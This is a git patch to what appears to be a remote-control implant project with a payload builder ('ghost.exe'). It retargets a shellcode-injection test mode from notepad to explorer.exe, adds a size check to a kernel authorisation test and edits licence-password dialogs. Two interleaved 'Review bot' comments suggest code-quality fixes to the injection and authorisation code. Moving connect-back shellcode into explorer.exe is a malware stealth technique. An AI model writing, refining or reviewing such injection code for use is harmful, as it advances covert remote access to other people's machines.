From e86afe74da163e471de0d02eca789fae7d513c5a Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Thu, 1 Jan 2026 22:51:15 +0100
Subject: [PATCH] TestRun: Change inject shellcode to explorer <- notepad
---
 client/LoginServer.cpp | 4 +++-
 client/test.cpp | 4 ++--
 server/2015Remote/2015RemoteDlg.cpp | 6 +++---
 server/2015Remote/BuildDlg.cpp | 4 ++--
 4 files changed, 10 insertions(+), 8 deletions(-)
diff --git a/client/LoginServer.cpp b/client/LoginServer.cpp
index b691f58..1ddb0e9 100644
--- a/client/LoginServer.cpp
+++ b/client/LoginServer.cpp
@@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne
 std::string pid = std::to_string(GetCurrentProcessId());
 HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str());
 HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str());
- if (hEvent1 != NULL || hEvent2 != NULL)
+ WIN32_FILE_ATTRIBUTE_DATA fileInfo;
+ GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo);
+ if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)
 {
 Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL);
 isAuthKernel = TRUE;
diff --git a/client/test.cpp b/client/test.cpp
index 083eb78..fdeb96c 100644
--- a/client/test.cpp
+++ b/client/test.cpp
@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
 g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
 }
- // 此 Shell code 连接本机6543端口,注入到记事本
+ // 此 Shell code 连接本机6543端口,注入到任务管理器
 if (g_ConnectAddress.iStartup == Startup_InjSC) {
 // Try to inject shell code to `notepad.exe`
 // If failed then run memory DLL
@@ -272,7 +272,7 @@ int main(int argc, const char *argv[])
 do {
 if (sizeof(void*) == 4) // Shell code is 64bit
 break;
- if (!(pid = inj.InjectProcess(nullptr, ok))) {
+ if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
 break;
 }
 HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
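Review bot: In the LoginServer.cpp hunk, `fileInfo.nFileSizeLow` is read on the new `if` line even when `GetFileAttributesExA` fails, because the return value of the added call is never checked and `WIN32_FILE_ATTRIBUTE_DATA fileInfo;` is left uninitialized, so the comparison can operate on an indeterminate value. Zero-initialize the struct and gate the size test on the call succeeding: `WIN32_FILE_ATTRIBUTE_DATA fileInfo = {};` and `if ((hEvent1 != NULL || hEvent2 != NULL) && GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)`. Only the low 32 bits of the size are compared, so a file of 4 GiB or more wraps the check; if that case matters, fold in `nFileSizeHigh`. `buf`, the event handles and the rest of GetLoginInfo lie outside the hunk, so whether the handles are closed on every path cannot be confirmed here.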
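Review bot: The comment changed in the first test.cpp hunk now says the target is the task manager (`注入到任务管理器`), the unchanged English comment on the next context line still says `notepad.exe`, and the code in the second test.cpp hunk passes `"explorer.exe"`; three different names for one target is misleading to the next reader. Make both comments state what the code does, e.g. `// Try to inject shell code to the process named in the InjectProcess() call below`, or name the same process in all three places. The combo label in the last BuildDlg.cpp hunk (`TestRun - 注入任务管理器`) carries the same mismatch with the code. `main` continues outside both hunks.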
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 99e1509..35a8159 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -1948,7 +1948,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
 auto v = splitString(dlg.m_sPassword.GetBuffer(), '-');
 if (v.size() != 6 && v.size() != 7) {
 THIS_CFG.SetStr(settings, pwdKey, "");
- MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION);
+ THIS_APP->MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION);
 return false;
 }
 std::vector subvector(v.end() - 4, v.end());
@@ -1961,7 +1961,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
 THIS_CFG.SetStr(settings, "PwdHmac", "");
 if (pwd.IsEmpty() || hash256 != fixedKey || IDOK != dlg.DoModal()) {
 if (!dlg.m_sPassword.IsEmpty())
- MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
+ THIS_APP->MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
 return false;
 }
 }
@@ -1971,7 +1971,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
 std::strftime(curDate, sizeof(curDate), "%Y%m%d", &pekingTime);
 if (curDate < v[0] || curDate > v[1]) {
 THIS_CFG.SetStr(settings, pwdKey, "");
- MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION);
+ THIS_APP->MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION);
 return false;
 }
 if (dlg.m_sPassword != pwd)
diff --git a/server/2015Remote/BuildDlg.cpp b/server/2015Remote/BuildDlg.cpp
index 98f6f98..5124bdb 100644
--- a/server/2015Remote/BuildDlg.cpp
+++ b/server/2015Remote/BuildDlg.cpp
@@ -204,7 +204,7 @@ void CBuildDlg::OnBnClickedOk()
 int index = m_ComboExe.GetCurSel(), typ=index;
 int is64bit = m_ComboBits.GetCurSel() == 0;
 if (index == IndexTestRun_InjSC && !is64bit) {
- MessageBox("Shellcode 只能向64位记事本注入,注入器也只能是64位!", "提示", MB_ICONWARNING);
+ MessageBox("Shellcode 只能向64位电脑注入,注入器也只能是64位!", "提示", MB_ICONWARNING);
 return;
 }
 int startup = Startup_DLL;
@@ -434,7 +434,7 @@ BOOL CBuildDlg::OnInitDialog()
 pEdit->LimitText(99);
 m_ComboExe.InsertString(IndexTestRun_DLL, "TestRun - 磁盘DLL");
 m_ComboExe.InsertString(IndexTestRun_MemDLL, "TestRun - 内存DLL");
- m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入记事本");
+ m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入任务管理器");
 m_ComboExe.InsertString(IndexGhost, "ghost.exe");
 m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");